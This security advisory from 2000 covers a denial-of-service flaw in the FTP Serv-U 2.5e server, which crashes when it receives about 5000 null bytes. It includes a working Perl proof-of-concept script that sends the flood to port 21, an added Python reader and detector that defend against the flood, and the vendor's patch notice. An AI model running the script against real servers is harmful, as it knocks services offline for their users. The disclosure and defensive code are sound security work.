FTP Serv-U 2.5e Subject to Denial of Service
By sending 5000 null bytes to the FTP service, the service can be made to crash.
August 6, 2000
Reported August 7, 2000 by Blue Panda
VERSIONS AFFECTED
FTP Serv-U 2.5e
DESCRIPTION
The Serv-U FTP service can be made to generate stack faults by sending it approximately 5000 null bytes. Such an attack can leave the underlying operating system unstable, to the point where it may eventually crash.
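The defensive counterpart to the flood described above, as an added example that is not from the advisory or from Serv-U: a command-line reader that refuses NUL bytes and bounds how much is buffered before a CRLF, plus a simple detector that flags sessions containing long NUL runs. MAX_LINE (512 bytes) and NUL_ALERT (32 consecutive NULs) are assumed, conservative thresholds; the sample sessions are constructed.

```python
# Added example, not from the original advisory or from Serv-U: a bounded FTP
# command reader plus a detector for null-byte floods like the one described
# above. MAX_LINE and NUL_ALERT are assumed thresholds, not advisory values.

MAX_LINE = 512   # assumed cap on one command line, including CRLF
NUL_ALERT = 32   # assumed: this many consecutive NULs never occurs in real FTP


def read_commands(stream: bytes):
    """Split a raw client byte stream into FTP command lines.

    Returns (commands, rejection). rejection is None for a clean stream,
    otherwise a short reason; parsing stops at the first violation so the
    offending bytes are never copied into a fixed-size buffer.
    """
    commands = []
    buf = bytearray()
    for b in stream:
        if b == 0:
            return commands, "NUL byte in command stream"
        buf.append(b)
        if len(buf) > MAX_LINE:
            return commands, "command line exceeds %d bytes" % MAX_LINE
        if buf.endswith(b"\r\n"):
            commands.append(buf[:-2].decode("ascii", "replace"))
            buf.clear()
    return commands, None


def longest_nul_run(payload: bytes) -> int:
    """Length of the longest run of consecutive 0x00 bytes in payload."""
    best = run = 0
    for b in payload:
        run = run + 1 if b == 0 else 0
        best = max(best, run)
    return best


def flag_sessions(sessions):
    """Given (client, payload) records, return the clients whose payload
    contains a run of NUL_ALERT or more consecutive NUL bytes."""
    return [client for client, payload in sessions
            if longest_nul_run(payload) >= NUL_ALERT]


if __name__ == "__main__":
    # Constructed sample traffic: one normal login and one 5000-NUL flood.
    SAMPLE = [("client-A", b"USER anonymous\r\nPASS guest@\r\n"),
              ("client-B", b"\x00" * 5000)]
    print(read_commands(SAMPLE[0][1]))   # (['USER anonymous', 'PASS guest@'], None)
    print(read_commands(SAMPLE[1][1]))   # ([], 'NUL byte in command stream')
    print(flag_sessions(SAMPLE))         # ['client-B']
```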
DEMONSTRATION
#!/usr/bin/perl
#
# FTP Serv-U 2.5e denial-of-service
# Blue Panda - [email protected]
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Crashes FTP Serv-U 2.5e by sending it a string of null bytes.
#
use strict;
use warnings;
use IO::Socket;

my $host = "ftp.host.com";
my $port = 21;

print "Connecting to $host:$port...";
my $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
    or die "failed.\n";
print "done.\n";

# Build a 5000-byte buffer of NUL (0x00) bytes. The escape is "\x00";
# the backslash was lost in the extracted listing ("x00" would have sent
# the literal three characters x, 0, 0 instead of null bytes).
my $buf = "\x00" x 5000;

print $socket $buf;
sleep(4);
close($socket);
VENDOR RESPONSE
The vendor, Deerfield, is aware of the problem and has released a patched version 2.5f.
CREDIT
Discovered by Blue Panda